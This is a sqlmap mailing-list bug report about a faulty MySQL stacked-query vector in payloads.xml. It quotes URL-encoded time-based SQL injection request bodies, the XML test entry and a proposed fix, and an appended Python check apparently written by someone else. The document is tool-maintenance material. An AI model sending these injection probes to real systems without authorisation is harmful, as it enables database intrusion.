Hi,
I have found a misbehavior in the detection phase: sqlmap detects a
stacked-query injection point with the following request:
POST /path
abc=%27%29%3B%20SELECT%20SLEEP%285%29--%20
However, when sqlmap checks whether the injection point is a false positive,
it uses the following payload:
abc=%27%29%3B%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20
At this point it reports a false positive or an unexploitable injection point, so
the correct payload for MySQL v5.5 would be:
%27%29%3B%20SELECT%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20
The problem is in line 2028 of the xml/payloads.xml file; the correct one for
MySQL v5.5 is:
<vector>; *SELECT* IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
payloads.xml:
...
<!-- Stacked queries tests -->
<test>
<title>MySQL > 5.0.11 stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <!-- the line in question -->
<request>
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
<comment>-- </comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>> 5.0.11</dbms_version>
</details>
</test>
Regards
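An added check, written for this report and not taken from sqlmap or from the reporter, that parses the quoted <test> entry, renders the vector with the values visible in the two requests, confirms that the rendering matches the URL-decoded bodies, and flags the stacked vector as invalid because IF(...) is a function, not a statement. The prefix "')" and the helper names are assumptions for the example.

```python
import re
from urllib.parse import unquote
import xml.etree.ElementTree as ET

# Constructed copy of the payloads.xml <test> entry quoted in the report
# (the reporter's emphasis markers removed so that it parses as XML).
TEST_XML = """<test>
<title>MySQL > 5.0.11 stacked queries</title>
<stype>4</stype><level>1</level><risk>0</risk><clause>0</clause><where>1</where>
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request><payload>; SELECT SLEEP([SLEEPTIME])</payload><comment>-- </comment></request>
<response><time>[SLEEPTIME]</time></response>
<details><dbms>MySQL</dbms><dbms_version>> 5.0.11</dbms_version></details>
</test>"""

# The corrected vector proposed in the report.
FIXED_VECTOR = "; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])"

# Request bodies quoted in the report (detection, confirmation, corrected).
DETECTION_BODY = "abc=%27%29%3B%20SELECT%20SLEEP%285%29--%20"
CONFIRM_BODY = "abc=%27%29%3B%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20"
CORRECT_BODY = "abc=%27%29%3B%20SELECT%20IF%28%28%2884%2B88%29%3D172%29%2CSLEEP%285%29%2C5577%29--%20"

# Keywords MySQL accepts at the start of a stacked statement; a bare
# function call such as IF(...) is not one of them, which is the bug.
STATEMENT_KEYWORDS = ("SELECT", "INSERT", "UPDATE", "DELETE", "SET", "DO")


def load_test(xml=TEST_XML):
    """Parse one <test> entry (assumed helper)."""
    return ET.fromstring(xml)


def render(template, inference="(84+88)=172", sleeptime=5, randnum=5577):
    """Substitute sqlmap's placeholders with the values seen in the report."""
    return (template.replace("[INFERENCE]", inference)
                    .replace("[SLEEPTIME]", str(sleeptime))
                    .replace("[RANDNUM]", str(randnum)))


def decode_body(body, param="abc"):
    """URL-decode one parameter of an x-www-form-urlencoded body."""
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    return unquote(fields[param])


def expected_request(test_elem, prefix="')", use_vector=True):
    """Rebuild the injected value: prefix + rendered vector/payload + comment."""
    tag = "vector" if use_vector else "request/payload"
    return prefix + render(test_elem.find(tag).text) + test_elem.find("request/comment").text


def stacked_vector_is_valid(vector):
    """True if the text after ';' begins with a real statement keyword."""
    stmt = vector.lstrip(";").strip()
    return bool(re.match(r"(%s)\b" % "|".join(STATEMENT_KEYWORDS), stmt, re.I))
```

Running the checks shows the detection payload and the confirmation vector both reproduce the quoted requests exactly, and only the corrected vector passes the statement-keyword check.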
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users